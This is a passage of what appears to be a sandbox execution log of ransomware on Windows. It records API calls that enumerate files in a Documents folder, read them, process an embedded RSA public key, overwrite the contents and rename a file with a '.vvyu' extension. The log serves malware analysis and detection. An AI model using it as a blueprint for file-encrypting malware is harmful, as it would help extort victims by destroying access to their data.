(HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a98 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ab0 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2af8 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ae0 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0194.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea5220 [0194.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2af8 | out: hHeap=0x620000) returned 1 [0194.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea5430 [0194.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0194.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea5648 [0194.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5430 | out: hHeap=0x620000) returned 1 [0194.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5648 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0194.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0194.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0d50 | out: hHeap=0x620000) returned 1 [0194.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5220 | out: hHeap=0x620000) returned 1 [0194.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.093] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3a68*, nNumberOfBytesToWrite=0x17af, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea3a68*, lpNumberOfBytesWritten=0x312fb14*=0x17af, lpOverlapped=0x0) returned 1 [0194.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.104] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.104] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.106] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.106] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.106] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.106] CloseHandle (hObject=0x568) returned 1 [0194.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea3a68 [0194.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.108] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\QtNn2GZ.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\qtnn2gz.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\QtNn2GZ.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\qtnn2gz.xlsx.vvyu")) returned 1 [0194.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.110] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.113] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8efb350, ftCreationTime.dwHighDateTime=0x1d82477, ftLastAccessTime.dwLowDateTime=0x55be2120, ftLastAccessTime.dwHighDateTime=0x1d84973, ftLastWriteTime.dwLowDateTime=0x55be2120, ftLastWriteTime.dwHighDateTime=0x1d84973, nFileSizeHigh=0x0, nFileSizeLow=0x9221, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tPG-9VHK-ulBZl_Q.docx", cAlternateFileName="TPG-9V~1.DOC")) returned 1 [0194.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d50 [0194.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0194.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0d50 | out: hHeap=0x620000) returned 1 [0194.113] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\tPG-9VHK-ulBZl_Q.docx") returned=".docx" [0194.114] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\tPG-9VHK-ulBZl_Q.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\tpg-9vhk-ulbzl_q.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.115] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=37409) returned 1 [0194.115] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.119] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x91fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.119] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.122] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.122] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x9221, lpOverlapped=0x0) returned 1 [0194.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.123] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.124] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.124] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.124] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.124] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.124] GetLastError () returned 0x0 [0194.124] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.124] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.125] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.125] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.125] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9220) returned 0x2ea79b0 [0194.125] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d50 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d98 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a98 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.126] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2a80 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2a98 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.130] GetCurrentThreadId () returned 0x66c [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fad0 [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.130] GetCurrentThreadId () returned 0x66c [0194.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 